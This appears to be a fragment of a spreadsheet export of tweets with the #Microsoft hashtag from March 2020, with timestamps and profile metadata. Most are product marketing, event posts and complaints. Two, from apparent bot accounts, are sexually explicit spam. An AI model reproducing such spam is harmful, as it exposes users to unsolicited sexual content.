    <t>Sony PS5, Microsoft Xbox Series X price speculation hit the web again #sony #microsoft #ps5 #xboxseriesx https://t.co/oGUWQZwOsQ https://t.co/roPJgUNYzZ</t>
  </si>
  <si>
    <t>Tue Mar 03 10:19:01 +0000 2020</t>
  </si>
  <si>
    <t>Everyone interested in some more details about Microsoft Universal Print solution should have a look at "What is Universal Print" docs article 
#Printing #UniversalPrint #Microsoft #CloudPrinting
https://t.co/9OOpfRoFhX</t>
  </si>
  <si>
    <t>Tue Mar 03 10:18:21 +0000 2020</t>
  </si>
  <si>
    <t>Another very well attended #HPE and #Microsoft #HybridCloud summit is in full motion in Cairo Egypt today! Next up Lisbon March 5th and Dubai March 11th plus many more: All information right here: https://t.co/8Mq0BHIqw1 #AzureStack @msPartner @HPE_UAE #HPEAlliances https://t.co/cMzFUPpNn3</t>
  </si>
  <si>
    <t>Tue Mar 03 10:13:10 +0000 2020</t>
  </si>
  <si>
    <t>Umar Bari from #Microsoft kicking off his session by sharing how he really thought #Aberdeen was less than an hour away from #Glasgow. Sorry, Umar.  But it's absolutely an honour and a privilege to have you today.
#customerinsights #DynamicsForum https://t.co/tbdmishEEm</t>
  </si>
  <si>
    <t>Tue Mar 03 10:13:03 +0000 2020</t>
  </si>
  <si>
    <t>With SQL Server 2017 and Azure Data Services, your business has the opportunity to transform and stand out among the competition. Contact Cloud Nexus to learn more about how you can make #Microsoft Azure work for you. https://t.co/wvRNLyJHLN</t>
  </si>
  <si>
    <t>{'id': 526368218, 'id_str': '526368218', 'name': 'Cloud Nexus', 'screen_name': 'UKCloudNexus', 'location': 'Leeds, England', 'description': 'Cloud Nexus are a leading provider of IT consultancy services in the UK.', 'url': 'https://t.co/jXKg8CMb3b', 'entities': {'url': {'urls': [{'url': 'https://t.co/jXKg8CMb3b', 'expanded_url': 'https://www.cloudnexus.co.uk', 'display_url': 'cloudnexus.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 34, 'friends_count': 52, 'listed_count': 1, 'created_at': 'Fri Mar 16 12:56:47 +0000 2012', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 168,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'http://pbs.twimg.com/profile_images/1117807280618131462/_BqQL1hh_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117807280618131462/_BqQL1hh_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/526368218/1555341686', 'profile_link_color': '00A8A9',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</si>
  <si>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10:13:02 +0000 2020</t>
  </si>
  <si>
    <t>With SQL Server 2017 and Azure Data Services, your business has the opportunity to transform and stand out among the competition. Contact Cloud Nexus to learn more about how you can make #Microsoft Azure work for you. https://t.co/b3H2wOCKDP</t>
  </si>
  <si>
    <t>{'id': 201033693, 'id_str': '201033693', 'name': 'Scott Riley', 'screen_name': 'Fauxnuts', 'location': 'Leeds, UK', 'description': 'Tech strategy guy, Founder of Cloud Nexus. I help businesses move to the cloud. Proud Dad of two superheroes! Xbox streamer on Twitch - I share my own opinions', 'url': 'https://t.co/RiYgAl8rXR', 'entities': {'url': {'urls': [{'url': 'https://t.co/RiYgAl8rXR', 'expanded_url': 'http://www.scottriley.co.uk', 'display_url': 'scottriley.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 379, 'friends_count': 329, 'listed_count': 37, 'created_at': 'Sun Oct 10 22:37:38 +0000 2010', 'favourites_count': 1179, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1858,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'http://pbs.twimg.com/profile_images/876742948448342016/WNbUeZl6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876742948448342016/WNbUeZl6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/201033693/1497866653',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</si>
  <si>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10:12:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft new chrome engine bad so much</t>
  </si>
  <si>
    <t>Tue Mar 03 10:10:55 +0000 2020</t>
  </si>
  <si>
    <t>Are you looking for #Microsoft #BusinessCentral training that covers all modules that are required to implement a successful system for your organization and satisfy your clients? TMRC is going to organize a training session for this purpose. Register now: https://t.co/fuQJlLfOSf https://t.co/CEnXNAAFPi</t>
  </si>
  <si>
    <t>{'id': 862568741984448512, 'id_str': '862568741984448512', 'name': 'TMR Consulting', 'screen_name': 'tmr_consulting', 'location': 'Islamabad, Pakistan', 'description': 'ERP, Accounting, IT and Management Consulting Services for Businesses across the Globe\nWe are also official Certified Microsoft Gold Partners', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 624, 'friends_count': 4236, 'listed_count': 3, 'created_at': 'Thu May 11 07:23:08 +0000 2017', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 726, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1151459644713426944/uPK54HWT_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1151459644713426944/uPK54HWT_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/862568741984448512/1578046924',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</si>
  <si>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10:10:11 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/ndQHioBlse</t>
  </si>
  <si>
    <t>{'id': 49616904, 'id_str': '49616904', 'name': 'TCS Computer Services', 'screen_name': 'tcscs', 'location': 'Bexley, Kent', 'description': 'TCS Computer Services Limited is based in Bexley, Kent and have been an independent computer services company since 1967.\nplease visit our website.', 'url': 'https://t.co/HYtcN5livC', 'entities': {'url': {'urls': [{'url': 'https://t.co/HYtcN5livC', 'expanded_url': 'https://tcscs.co.uk', 'display_url': 'tcscs.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 137, 'listed_count': 2, 'created_at': 'Mon Jun 22 12:44:38 +0000 2009', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 182, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D2DCE6', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1098593056423579649/s4wyZ9QS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098593056423579649/s4wyZ9QS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/49616904/1550759941', 'profile_link_color': '4A6BA5', 'profile_sidebar_border_color': '003366', 'profile_sidebar_fill_color': 'CACEDC', 'profile_text_color': '003366', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 10:09:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft google and youtube and chrome and edge and update and setting crash and down and heavy and lag and stopped and bad response and bad feedback and bad connection and speed and performance and bad browsing</t>
  </si>
  <si>
    <t>Tue Mar 03 10:07:43 +0000 2020</t>
  </si>
  <si>
    <t>Check out how Kelly Roofing achieved a 508% ROI and 2.4-month payback period on their successful #MSDyn365 Business Central implementation!      #Microsoft #Technology #IT #BusinessAutomation https://t.co/NFBLFE29Br</t>
  </si>
  <si>
    <t>{'id': 3416167599, 'id_str': '3416167599', 'name': 'IT Addicts', 'screen_name': 'ITAddicts', 'location': 'Axminster, England', 'description': 'Securing, Monitoring and Driving Efficiencies with your IT infrastructure while you run your business.', 'url': 'http://t.co/vRaC8I6nWw', 'entities': {'url': {'urls': [{'url': 'http://t.co/vRaC8I6nWw', 'expanded_url': 'http://www.itaddicts.co.uk', 'display_url': 'itaddicts.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 28, 'friends_count': 250, 'listed_count': 0, 'created_at': 'Tue Aug 11 21:13:21 +0000 2015', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 319,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'http://pbs.twimg.com/profile_images/631212108793909248/xdmOavqp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/631212108793909248/xdmOavqp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3416167599/1582462910',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</si>
  <si>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10:06:57 +0000 2020</t>
  </si>
  <si>
    <t>Just announced
Phantom Magenta and Arctic Camo Xbox one controllers!
You can preorder these in store for a small deposit, and you'll be guaranteed your own! Make sure you don't miss out on the latest special edition controllers!
#XboxOne #Collector #Microsoft #PreOrder https://t.co/ufOwSYJyGs</t>
  </si>
  <si>
    <t>{'id': 488917805, 'id_str': '488917805', 'name': 'GAME Castleford', 'screen_name': 'GAME_Castleford', 'location': 'Glasshoughton, Castleford, ', 'description': 'Welcome to GAME Castleford. Follow us for the latest gaming news, events and information direct from the store in Castleford.', 'url': 'https://t.co/9dseonUxBj', 'entities': {'url': {'urls': [{'url': 'https://t.co/9dseonUxBj', 'expanded_url': 'http://www.game.co.uk', 'display_url': 'game.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1140, 'friends_count': 481, 'listed_count': 55, 'created_at': 'Sat Feb 11 00:18:22 +0000 2012', 'favourites_count': 1280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11017,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'http://pbs.twimg.com/profile_images/1068153789591547910/CP1kwh7f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068153789591547910/CP1kwh7f_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/488917805/1543502684', 'profile_link_color': '1B1B1B',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</si>
  <si>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Tue Mar 03 10:06:40 +0000 2020</t>
  </si>
  <si>
    <t>Update : EASY for Dynamics 365 BC is the new interface for seamless connection to EASY document management in the leading ERP Microsoft Dynamics 365 Business Central (NAV).   
https://t.co/WGxg8L7ZDx
#EASYSOFTWARE #microsoft #dynamics #ERP #documentmanagement #archiving #365BC https://t.co/VWhaEoD9cq</t>
  </si>
  <si>
    <t>Tue Mar 03 10:06:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft google and youtube and chrome and edge and update and setting crash and down and heavy and lag and stopped and bad response</t>
  </si>
  <si>
    <t>Tue Mar 03 10:05:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Comfort Optical Mouse 1000 Black-Grey USB https://t.co/XlUUBcZy7b #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 10:03:08 +0000 2020</t>
  </si>
  <si>
    <t>Do you like to eat delicious after sex? I really love #Cedar Rapids   #oil #microsoft https://t.co/hFGuT5m2VS</t>
  </si>
  <si>
    <t>{'id': 1234540882478718977, 'id_str': '1234540882478718977', 'name': 'Bonnie Petersen', 'screen_name': 'brahselili', 'location': 'Syracuse, USA', 'description': 'A great marriage is not when the â€˜perfect coupleâ€™ comes together. It is when an imperfect couple learns to enjoy their differences.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Mon Mar 02 18:07:43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'http://pbs.twimg.com/profile_images/1234623734490836993/7CX6n-0I_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234623734490836993/7CX6n-0I_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234540882478718977/1583192240',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</si>
  <si>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10:03:07 +0000 2020</t>
  </si>
  <si>
    <t>How healthy is your data? There are multiple dimensions and angles you should examine to ensure your data is healthy; https://t.co/MgXCbSUgln
#data, #database, #SQLServer, #dataanalytics, #powerbi, #Microsoft, #Tabular, #AnalysisServices, #ReportingServices, #Azure</t>
  </si>
  <si>
    <t>Tue Mar 03 10:03:00 +0000 2020</t>
  </si>
  <si>
    <t>Why Office 365 Backup is Essential -- https://t.co/z7EjXf7nyl #Microsoft #IT https://t.co/L8FpNYQcC5</t>
  </si>
  <si>
    <t>Tue Mar 03 10:02:44 +0000 2020</t>
  </si>
  <si>
    <t>#PoriniEducation team at work for #Microsoft #Dynamics365 Applications course. Discover our complete training offer and concact us for any information https://t.co/XIEBHEuH52 https://t.co/0ZHjruo5gI</t>
  </si>
  <si>
    <t>{'id': 2829912415, 'id_str': '2829912415', 'name': 'Porini', 'screen_name': 'PoriniGroup', 'location': 'Como, Milano, Porto, New York', 'description': 'Porini is a Global Business Consulting and Microsoft Solution Provider renowned for its Apparel and Textile industry experience.', 'url': 'https://t.co/WPxtfsn2I5', 'entities': {'url': {'urls': [{'url': 'https://t.co/WPxtfsn2I5', 'expanded_url': 'http://www.porini.it', 'display_url': 'porini.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 203, 'friends_count': 117, 'listed_count': 28, 'created_at': 'Wed Sep 24 13:15:03 +0000 2014', 'favourites_count': 136, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 574,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'http://pbs.twimg.com/profile_images/1176475085185699841/xsCQ3wRC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176475085185699841/xsCQ3wRC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2829912415/1558530354',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</si>
  <si>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10:02:12 +0000 2020</t>
  </si>
  <si>
    <t>It doesnt get more bleeding edge than our #customerinsights session presented by Moreno from @inc_group_uk &amp;amp;Umar from #Microsoft at #DynamicsForum #Aberdeen.Today they tell us how to build customer loyalty with this fantastic new product.
#Glasgow, be ready,We'll see you tomorrow https://t.co/lV1vJSgcJv</t>
  </si>
  <si>
    <t>Tue Mar 03 10:00:59 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen #Microsoft Surface Duo could be launching earlier than expected https://t.co/AdK4Jm6gmZ via @techradar
#tech #smartphones</t>
  </si>
  <si>
    <t>Tue Mar 03 10:00:48 +0000 2020</t>
  </si>
  <si>
    <t>Today @JP_Courtois is meeting with our 12 cohort members to discuss the way that businesses measure their impact on society, and the role that AI can play in creating a positive social transformation here in the UK.
#Microsoft #AIForGood</t>
  </si>
  <si>
    <t>Tue Mar 03 10:00:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsofts xCloud game streaming arrives on iOS with some Apple restrictions https://t.co/bZfhqdxikU #Microsoft #XCloud #Videogames #Cloud #Market #Apple #iOS https://t.co/D15xfNWXju</t>
  </si>
  <si>
    <t>Tue Mar 03 09:58:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #RPA A serious player in the game! https://t.co/XpKIbuCcgt</t>
  </si>
  <si>
    <t>{'id': 492357131, 'id_str': '492357131', 'name': 'Alfredo Barba Polo', 'screen_name': 'abarbap', 'location': 'BogotÃ¡ - Colombia', 'description': '#Asynka Founder, Dreamer. Married, with a small boy and a Music Lover. I love IT. I have what I have.', 'url': 'https://t.co/svkiNlXeJl', 'entities': {'url': {'urls': [{'url': 'https://t.co/svkiNlXeJl', 'expanded_url': 'https://asynka.blog', 'display_url': 'asynka.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 857, 'friends_count': 377, 'listed_count': 50, 'created_at': 'Tue Feb 14 16:38:56 +0000 2012', 'favourites_count': 686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3174,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'http://pbs.twimg.com/profile_images/1133100614358110210/ItEXdySN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133100614358110210/ItEXdySN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/492357131/1439500453',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</si>
  <si>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09:57:38 +0000 2020</t>
  </si>
  <si>
    <t>$MSFT's Aroon indicator drops into Downtrend on February 13, 2020. View odds for this and other indicators: https://t.co/ydVA2DqRHi #Microsoft #stockmarket #stock #technicalanalysis #money #trading #investing #daytrading #news #today https://t.co/TGcKcw9Wo2</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</si>
  <si>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</si>
  <si>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09:56:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #O365 #Office365 #SecurityComplianceCenter #ThreatExplorer #bug:
Search messages, select all then deselect one. Actions &amp;gt; Report phishing &amp;gt; guess which gets reported?
Can anyone else test &amp;amp; verify this? https://t.co/TxC8OfZe5L</t>
  </si>
  <si>
    <t>{'id': 195346578, 'id_str': '195346578', 'name': 'Anon Bluehat', 'screen_name': 'abh4t', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8, 'friends_count': 22, 'listed_count': 0, 'created_at': 'Sun Sep 26 13:28:51 +0000 2010', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1067392517681881089/aPM1ZVFr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1067392517681881089/aPM1ZVFr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/195346578/1543321725',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</si>
  <si>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09:55:50 +0000 2020</t>
  </si>
  <si>
    <t>#Quectel BC66 NB-IoT #Microsoft #Azure IoT MQTT https://t.co/Xc43eSPDUm</t>
  </si>
  <si>
    <t>{'id': 1338670124, 'id_str': '1338670124', 'name': 'WizIO', 'screen_name': 'TektonikaInfo', 'location': '', 'description': '', 'url': 'https://t.co/e0MYXflY2Y', 'entities': {'url': {'urls': [{'url': 'https://t.co/e0MYXflY2Y', 'expanded_url': 'http://www.wizio.eu', 'display_url': 'wizio.eu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 604, 'friends_count': 1801, 'listed_count': 1, 'created_at': 'Tue Apr 09 08:39:35 +0000 2013', 'favourites_count': 110, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1073, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0E0D02', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3497637595/20b7059b5293e23904a642ad38c24e61_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3497637595/20b7059b5293e23904a642ad38c24e61_normal.jpeg', 'profile_link_color': '895429', 'profile_sidebar_border_color': 'BEDFB6', 'profile_sidebar_fill_color': '0E0D02', 'profile_text_color': '39BD91', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 09:50:04 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Last Week in the City   @GarryWhite looks at the market-moving events that have shaped equity markets last week on  https://t.co/SShoJt0Zdo
#coronavirus #airlines #China #Italy #Brexit #Mastercard #Marriott #Microsoft #tech #IPOs #Barclays #Disney #VirginGalactic https://t.co/xA8Q4kDddN</t>
  </si>
  <si>
    <t>Tue Mar 03 09:47:07 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/2M0ySygtM7</t>
  </si>
  <si>
    <t>Tue Mar 03 09:44:15 +0000 2020</t>
  </si>
  <si>
    <t>Congrats @Microsoft Large survey finds Microsoft well-liked, most trusted US Technology Brand - https://t.co/Zq8zLLczUv #Technology #Survey #Microsoft Brand for US Tech Brand Read @mspoweruser survey results</t>
  </si>
  <si>
    <t>{'id': 410219569, 'id_str': '410219569', 'name': 'Christopher McMillan', 'screen_name': 'CEEKTechnology', 'location': 'Charlotte, NC', 'description': 'Accessibility / IT Specialist for Network, Virtual, Security and Operation System Deployment.  25 years Hardware and Software Tester.  Disney / Disneyland Nut', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4497, 'friends_count': 2120, 'listed_count': 2015, 'created_at': 'Fri Nov 11 20:15:38 +0000 2011', 'favourites_count': 42731, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 186741,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'http://pbs.twimg.com/profile_images/2342920299/v5nxzbxedemmiepkxqor_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2342920299/v5nxzbxedemmiepkxqor_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/410219569/1521813069', 'profile_link_color': 'CC3366',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</si>
  <si>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Tue Mar 03 09:40:06 +0000 2020</t>
  </si>
  <si>
    <t>Receiving students from @michiganstateu whos coming again to #GSIC HQ in Madrid to learn about the #innovation in the #sports industry  Happy yo see you! 
#Microsoft #sports #technology #education #startups #university #visit #InspirationDay https://t.co/XagFuJR3on</t>
  </si>
  <si>
    <t>Tue Mar 03 09:38:23 +0000 2020</t>
  </si>
  <si>
    <t>What a privilege to have @LucyAliceBourne  from #Microsoft telling us about the art of the possible with the different Microsoft 
Business applications at the keynote at our @inc_group_uk  #DynamicsForum in #Aberdeen today.  So many different solutions, so much potential!! https://t.co/LGOXS0Djxg</t>
  </si>
  <si>
    <t>Tue Mar 03 09:37:52 +0000 2020</t>
  </si>
  <si>
    <t>How can I make 70usd in the next 10 hours. My Windows license expires tomorrow and money remain 70usd to complete.
#Windows10Pro 
#Microsoft 
#TuesdayMotivation 
#IWD2020 
#Tuesdaythought</t>
  </si>
  <si>
    <t>Tue Mar 03 09:36:12 +0000 2020</t>
  </si>
  <si>
    <t>CVE-2020-0601 - CurveBall #vulnerability 
Spoofed key - code sign - MicrosoftRootCer.
MMC import.
Always keep updating and be secure &amp;amp; safe. @msdev
#Microsoft #Windows #defender #secure #update 
#CyberSecurity #hacker #hexagonTech 
#privilege #cyber #monolithic #cyberweapon https://t.co/cEOoDt9cHm</t>
  </si>
  <si>
    <t>{'id': 1233709733938417665, 'id_str': '1233709733938417665', 'name': 'Hexagon Tech | Cyber security', 'screen_name': 'TechHexagon', 'location': 'New Delhi, India', 'description': 'A Cyber Security Co.\nScrutiny\nPrivacy is a myth!\nBecome Monolithic!\nHackers - security glance', 'url': 'https://t.co/tkIR8WCX87', 'entities': {'url': {'urls': [{'url': 'https://t.co/tkIR8WCX87', 'expanded_url': 'http://www.hexagon.net.in', 'display_url': 'hexagon.net.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Sat Feb 29 11:07:39 +0000 2020', 'favourites_count': 0,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'http://pbs.twimg.com/profile_images/1233710620857503744/tx2469ci_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233710620857503744/tx2469ci_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1233709733938417665/1582976723',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</si>
  <si>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09:35:24 +0000 2020</t>
  </si>
  <si>
    <t>#Download this #new #document #tracking #template and #track all your #project #documentation -simple solutions for all businesses  https://t.co/KuzzPgjsuM
#simple #easy #microsoft #docs #smallbusiness #Startups #picture #design #excel #spreadsheet #powerpoint https://t.co/7yoyoNmPru</t>
  </si>
  <si>
    <t>Tue Mar 03 09:32:01 +0000 2020</t>
  </si>
  <si>
    <t>@Xbox @WatchMixer #Mixer.....The dyeing child from #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1401932442, 'id_str': '1401932442', 'name': 'ð”¹ð•ð• ð• ð••ð•Žð•šð•ð••', 'screen_name': 'MrBloodWild', 'location': 'San Francisco, CA', 'description': 'â˜† Gamer since 82 â˜† PC &amp; Xbox â˜† ðŸˆ #GoNiners ðŸˆ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 0, 'friends_count': 38, 'listed_count': 0, 'created_at': 'Sat May 04 10:36:37 +0000 2013', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 119, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0F0E0F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224289753106997249/Kmguh6PH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224289753106997249/Kmguh6PH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1401932442/1572196562', 'profile_link_color': 'FF0000',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</si>
  <si>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Tue Mar 03 09:30:42 +0000 2020</t>
  </si>
  <si>
    <t>Playing Game on Casio  How can it bear? #TuesdayThoughts #technology #casio #computer #programmer #animation #visual #UnrealEngine #NeedforSpeedHeat #GraphicsDesigner #TrendingNow #Microsoft #android11 #GodMorningTuesday #TuesdayMotivation #calculator https://t.co/AwWzLIGEhC</t>
  </si>
  <si>
    <t>{'id': 1062706239275220992, 'id_str': '1062706239275220992', 'name': 'Harsha Kommireddy', 'screen_name': 'HarshaKommired3', 'location': 'India', 'description': 'Hi Guys! i am Harsha, a computer Science Student, passion towards Technology, Always be ahead...Think NewðŸ¤” Be Creative ðŸ–¥ï¸\n\nRGB Creative, inc', 'url': 'https://t.co/J2IaWzb8VQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/J2IaWzb8VQ', 'expanded_url': 'https://www.youtube.com/channel/UCnSYZjlv7kCie7SxLUje9KA', 'display_url': 'youtube.com/channel/UCnSYZâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 82, 'listed_count': 1, 'created_at': 'Wed Nov 14 13:58:06 +0000 2018', 'favourites_count': 320, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1158561520877371392/T3KZFYhN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1158561520877371392/T3KZFYhN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1062706239275220992/1547482790',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</si>
  <si>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09:30:28 +0000 2020</t>
  </si>
  <si>
    <t>I love when cum in the face. Want Want #Oakland   #asian #microsoft https://t.co/dBS9hxuq90</t>
  </si>
  <si>
    <t>{'id': 1234715182141788160, 'id_str': '1234715182141788160', 'name': 'Chelsea Barnett', 'screen_name': 'indisdovan', 'location': 'Fargo, USA', 'description': 'A great marriage is not when the â€˜perfect coupleâ€™ comes together. It is when an imperfect couple learns to enjoy their differences.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 20, 'listed_count': 0, 'created_at': 'Tue Mar 03 05:40:19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'http://pbs.twimg.com/profile_images/1234740246086062081/w9zjOZER_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234740246086062081/w9zjOZER_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1234715182141788160/1583220033',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</si>
  <si>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09:25:43 +0000 2020</t>
  </si>
  <si>
    <t>In this #training course you will gain the #knowledge and #skills to implement #Azure IaaS services and features in their development solutions #virtualmachine # kubernetes #cloud #Microsoft https://t.co/nFd1FnU1JE https://t.co/Lt1GH3HAIn</t>
  </si>
  <si>
    <t>Tue Mar 03 09:21:53 +0000 2020</t>
  </si>
  <si>
    <t>Out-of-the-box business process automation is making a huge difference for customers. Watch how #MSDyn365BC puts your customers in the limelightwhere they belong! Watch now:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/TeaO66NfH1</t>
  </si>
  <si>
    <t>Tue Mar 03 09:21:43 +0000 2020</t>
  </si>
  <si>
    <t>Discover how #PowerBI enables Virgin Atlantic to create quick wins for internal #customerservice by unlocking the full potential of data. Learn more from GCC Group. #Microsoft https://t.co/8Sys9d5t9M</t>
  </si>
  <si>
    <t>Tue Mar 03 09:18:55 +0000 2020</t>
  </si>
  <si>
    <t>Expand your knowledge and skills by joining our free Power BI webinar featuring a variety of topics to jumpstart your Power BI career.
Register Now: https://t.co/WGnsgo1r33
#PowerBI #MicrosoftPowerBI #PowerBIWebinarFree
#Webinar #Free #Microsoft #Mindmajix https://t.co/bk7fZwvpCi</t>
  </si>
  <si>
